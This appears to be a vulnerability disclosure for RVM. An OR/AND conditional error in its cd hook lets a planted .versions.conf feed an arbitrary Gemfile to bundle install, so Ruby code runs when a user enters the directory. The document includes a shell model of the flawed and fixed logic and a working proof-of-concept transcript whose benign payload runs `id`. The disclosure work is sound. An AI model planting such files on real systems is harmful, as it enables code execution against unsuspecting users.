RVM, by default, hooks `cd` and automatically parses a file named
`.versions.conf` in the directory being changed to. The intention seems to be
that, if the user's `${rvm_autoinstall_bundler_flag}` setting is enabled, then
`.versions.conf` can specify a Gemfile that will automatically be fed to
`bundle install`. Due to an erroneous conditional that uses `||` (OR) instead
of `&&` (AND), `.versions.conf` can provide the name of an arbitrary Gemfile
that will automatically be fed to `bundle install` regardless of the state of
`${rvm_autoinstall_bundler_flag}`. The code responsible, as of a vulnerable
commit, is available at
<https://github.com/rvm/rvm/blob/b04c0158dbadc9a999a2af4f39bc008976b9ebf1/scripts/functions/rvmrc_project#L102-L113>.
This behaviour can be used to achieve immediate Ruby code execution upon `cd`
into a malicious directory, since Gemfiles are interpreted using Ruby (see
<https://github.com/bundler/bundler/issues/5178>).
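To make the `||`/`&&` mistake concrete, the following is an added shell model of that decision, not RVM's own code (whose exact lines are at the commit linked above). It assumes the flag counts as "on" when the variable is non-empty, treats `.versions.conf` as plain `key=value` lines, and adds a small audit helper that reports which Gemfile a `cd` into a directory would hand to `bundle install` under each variant of the conditional.

```shell
#!/bin/sh
# Model (added illustration, not RVM's own code) of the decision the RVM
# rvmrc_project hook makes on `cd`: given the user's rvm_autoinstall_bundler_flag
# and the ruby-bundle-install key read from an untrusted .versions.conf,
# should `bundle install` run on the Gemfile the conf names?

# Read the value of a key from a .versions.conf made of key=value lines.
versions_conf_value() {            # $1 = path to .versions.conf, $2 = key
  sed -n "s/^$2=//p" "$1" | head -n 1
}

# Vulnerable decision: flag set OR conf names a Gemfile. The untrusted file
# alone satisfies this, so the user's opt-in setting is never consulted.
should_bundle_vulnerable() {       # $1 = flag ("" = off), $2 = Gemfile from conf
  [ -n "$1" ] || [ -n "$2" ]
}

# Corrected decision: the user must have opted in AND the conf names a Gemfile.
should_bundle_fixed() {
  [ -n "$1" ] && [ -n "$2" ]
}

# Audit helper: print the Gemfile the hook would hand to `bundle install` on
# `cd "$1"` under the given flag value and decision function; prints nothing
# and returns 1 when nothing would run.
gemfile_fed_on_cd() {              # $1 = dir, $2 = flag, $3 = decision function
  conf="$1/.versions.conf"
  [ -f "$conf" ] || return 1
  gemfile=$(versions_conf_value "$conf" ruby-bundle-install)
  [ -n "$gemfile" ] || return 1
  "$3" "$2" "$gemfile" || return 1
  printf '%s\n' "$gemfile"
}

# Constructed sample directory mirroring the POC's .versions.conf.
POC_DIR=$(mktemp -d)
printf 'ruby=ruby-2.3.0\nruby-bundle-install=.doot\n' > "$POC_DIR/.versions.conf"

echo "vulnerable, flag off: $(gemfile_fed_on_cd "$POC_DIR" "" should_bundle_vulnerable)"
echo "fixed, flag off:      $(gemfile_fed_on_cd "$POC_DIR" "" should_bundle_fixed)"
echo "fixed, flag on:       $(gemfile_fed_on_cd "$POC_DIR" 1 should_bundle_fixed)"
```

With the flag off, only the vulnerable variant prints `.doot`, which is exactly the Gemfile the attacker-controlled file chose.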
### POC
```text
rvm@e6aeaf6d79ec:~$ mkdir poc
rvm@e6aeaf6d79ec:~$ cat > poc/.versions.conf
ruby=ruby-2.3.0
ruby-bundle-install=.doot
^D
rvm@e6aeaf6d79ec:~$ cat > poc/.doot
`echo "Arbitrary ruby code execution as $(id)" >&2`
^D
rvm@e6aeaf6d79ec:~$ cd poc
installing gem bundler --no-ri --no-rdoc.
Arbitrary ruby code execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm)
The Gemfile specifies no dependencies
Resolving dependencies...
Bundle complete! 0 Gemfile dependencies, 1 gem now installed.
Use `bundle show [gemname]` to see where a bundled gem is installed.
```